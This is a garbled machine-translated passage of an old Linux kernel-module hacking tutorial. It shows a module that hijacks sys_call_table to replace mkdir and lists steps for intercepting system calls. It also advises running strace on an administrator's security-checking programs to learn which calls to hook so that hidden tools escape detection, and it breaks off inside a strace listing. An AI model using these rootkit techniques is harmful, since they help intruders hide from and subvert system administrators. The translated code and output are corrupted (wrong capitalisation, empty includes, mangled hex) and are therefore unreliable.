Linux kernel module detachable full guide (in)

Article title: Linux kernel module detachable full Guide (medium ). Linux is a technology channel of the IT lab in China. Includes basic categories such as desktop applications, Linux system management, kernel research, embedded systems, and open source.
　　 Part 2 get better
　　
　　 2.1 How to intercept system calls
　　
Now we start to intrude into LKM. normally, LKMs is used to expand the kernel (especially those hardware drivers ). However, our 'hacks' does something different. They will intercept system calls and change them, in order to change the response methods of some system commands.
　　
The following module makes it impossible for any user to create a directory. This is just a small demonstration of our subsequent method.
　　
# Define MODULE
　　
# Define _ KERNEL __
　　
# Include
　　
# Include
　　
# Include
　　
# Include
　　
# Include
　　
# Include
　　
# Include
　　
# Include
　　
# Include
　　
# Include
　　
# Include
　　
# Include
　　
# Include
　　
Extern void * sys_call_table [];
　　
/* Sys_call_talbe is introduced, so we can access it */
　　
Int (* orig_mkdir) (const char * path );
　　
/* Original system call */
　　
Int hacked_mkdir (const char * path)
　　
{
　　
Return 0;
　　
/* All other operations are normal. except for the new operation, this operation does nothing */
　　
}
　　
Int init_module (void)
　　
/* Initialize the module */
　　
{
　　
Orig_mkdir = sys_call_table [SYS_mkdir];
　　
Sys_call_table [SYS_mkdir] = hacked_mkdir;
　　
Return 0;
　　
}
　　
Void cleanup_module (void)
　　
/* Uninstall the module */
　　
{
　　
Sys_call_table [SYS_mkdir] = orig_mkdir;
　　
/* Restore the original mkdir system call */
　　
}
　　
Compile and start this module (see 1.1 ). Then try to create a new directory, and you will find that it cannot be successful. Since the returned value is 0 (indicating that everything is normal), we do not get any error information. After moving the partition module, we can create a new directory. As you can see, we only need to change the corresponding entry in sys_call_table (see Figure 1.2) to intercept the system call.
　　
The common steps to intercept system calls are as follows:
　　
Find the system call entry in sys_call_table [] (take a look at include/sys/syscall. h)
　　
Save the Old entry pointer of sys_call_table [x. (Here x represents the index of the system call you want to intercept)
　　
Store your new function pointer to sys_call_table [x].
　　
You will realize that it is very useful to save the old system call pointer, because in your new call, you will need it to simulate the original call. When you are writing a 'Hack-LKM ', the first problem you face is:
　　
Which system call should I intercept?
　　
　　 2.2 Some interesting system calls
　　
You are not a God who manages the kernel, so you don't know which system calls are used by every user's application or command. Therefore, I will give you some tips to help you find the system calls under control.
　　
Read source code. In a system like linux, you can find the source code of the program used by any user (or administrator. Once you find a basic function, such as dup, open, write... to B
　　
Let's take a look at include/sys/syscall. h (see 1.2 ). Try to directly find the corresponding system call (find dup-> you will find SYS_dup, find write, you will find SYS_write ;....). If the switch to c is not found
　　
Some calls such as socket, send, receive,... are not implemented through a system call-as I have said before. Now let's take a look at the header file that contains the relevant system call.
　　
Remember that not every function in the c library is called by the system. The vast majority of such functions have nothing to do with system calls. A slightly experienced hacker will look at the list in 1.2, which provides enough information. For example, you need to know that user ID management is implemented through uid system calls. If you really want to be sure, you can check the source code of the library function/kernel.
　　
The most difficult problem is that a system administrator writes his own applications to check system integrity or security. The problem with these programs lies in the lack of source code. We cannot determine how the program works and what system calls we should intercept to hide our gifts/tools. It is even possible that he introduced an LKM that intercepts the system calls that hacker often uses to hide himself, and check the security of the system (system administrators often use some hacking techniques to protect their systems ).
　　
So how should we continue?
　　
　　 2.2.1 discovering interesting system calls (strace method)
　　
Suppose you already know the program used by a system administrator to check the system (this can be obtained through some other methods, such as TTY hijacking (see 2.9/appendix
　　
A) now the only problem is that you need to keep your gift away from the system administrator program .....).
　　
Well, run this program with strace now (maybe you need root permission to execute it)
　　
# Strace super_admin_proggy
　　
This will give you a great output about every system call of this program. These system calls may be added to your hacking LKM. I don't have such a hypervisor as an example. But let's look at the output of 'strace whoam:
　　
Execve ("/usr/bin/whoami", ["whoami"], [/* 50 vars */]) = 0
　　
Mmap (0, 4096, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS,-1, 0) =
　　
Zero x 40007000
　　
Mprotect (0x40000000,206 73, PROT_READ | PROT_WRITE | PROT_EXEC) = 0
　　
Mprotect (0x8048000,632 4, PROT_READ | PROT_WRITE | PROT_EXEC) = 0
　　
Stat ("/etc/ld. so. cache", {st_mode = S_IFREG | 0644, st_size = 13363,...}) = 0
　　
Open ("/etc/ld. so. cache", O_RDONLY) = 3
　　
Mmap (0, 13363, PROT_READ, MAP_SHARED, 3, 0) = 0x40008000
　　
Close (3) = 0
　　
Stat ("/etc/ld. so. preload", 0xbffff780) =-1 ENOENT (No such file or
　　
Directory)
　　
Open ("/lib/libc. so.5", O_RDONLY) = 3
　　
Read (3, "\ 177ELF \ 1 \ 1 \ 1 \ 0 \ 0 \ 0 \ 0 \ 0 \ 0 \ 0 \ 0 \ 0 \ 3 "..., 4096) = 4096
　　
Mmap (0, 761856, PROT_NONE, MAP_PRIVATE | MAP_ANONYMOUS,-1, 0) = 0x4000c000
　　
Mmap (0x4000c000, 530945, PROT_READ | PROT_EXEC, MAP_PRIVATE | MAP_FIXED, 3, 0)
　　
= 0x4000c000
　　
Mmap (0x4008e000, 21648, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_FIXED, 3,
　　
0x81000) = 0x4008e000
　　
Mmap (0x40094000,204 536, PROT_READ | PROT_WRITE,
　　
MAP_PRIVATE | MAP_FIXED | MAP_ANONYMOUS,-1, 0) = 0x40094000
　　
Close (3) = 0
　　
Mprotect (0x4000c000, 530945, PROT_READ | PROT_WRITE | PROT_EXEC) = 0
　　
Munmap (0x40008000,133 63) = 0
　　
Mprotect (0x8048000,632 4, PROT_READ | PROT_EXEC) = 0
　　
Mprotect (0x4000c000, 530945, PROT_READ | PROT_EXEC) = 0
　　
Mprotect (0x40000000,206 73, PROT_READ | PROT_EXEC) = 0
　　
Personality (PER_LINUX) = 0
　　
Geteuid () = 500
　　
Getuid () = 500
　　
Getgid () = 100
　　
Getegid () = 100
　　
Brk (0x804aa48) = 0x804aa48
　　
Brk (0x804b000) = 0x804b000
　　
Open ("/usr/share/locale. alias", O_RDONLY) = 3
　　
Fstat (3, {st_mode = S_IFREG | 0644, st_size = 2005,...}) = 0
　　
Mmap (0, 4096, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS,-1, 0) =
　　
Zero x 40008000
　　
Read (3, "# Locale name alias data base \ n #"..., 4096) = 2005
　　
Brk (0x804c000) = 0x804c000
　　
Read (3, "", 4096) = 0
　　
Close (3) = 0
　　
Munmap (0x40008000,409 6) = 0
　　
Open ("/usr/share/i18n/locale. alias", O_RDONLY) =-1 ENOENT (No such file
　　
Or directory)
　　
Open ("/usr/share/locale/de_DE/LC_CTYPE", O_RDONLY) = 3
　　
Fstat (3, {st_mode = S_IFREG | 0644, st_size = 10399,...}) = 0
　　
Mmap (0, 10399, PROT_READ, MAP_PRIVATE, 3, 0) = 0x40008000
　　
Close (3) = 0
　　
Geteuid () = 500
　　
Open ("/etc/passwd", O_RDONLY) = 3
　　
Fstat (3, {st_mode = S_IFREG | 0644, st_size = 1074,...}) = 0
　　
Mmap (0, 4096, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS,-1, 0) =
　　
0x4000b000
　　
Read (3, "root: x: 0: 0: root:/bin/bash \ n"..., 4096) = 1074
　　
Close (3) = 0
　　
Munmap (0x4000b000, 4096) = 0
　　
Fstat (1, {st_mode = S_IFREG | 0644, st_size = 2798,...}) = 0
　　
Mmap (0, 4096, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS,-1, 0) =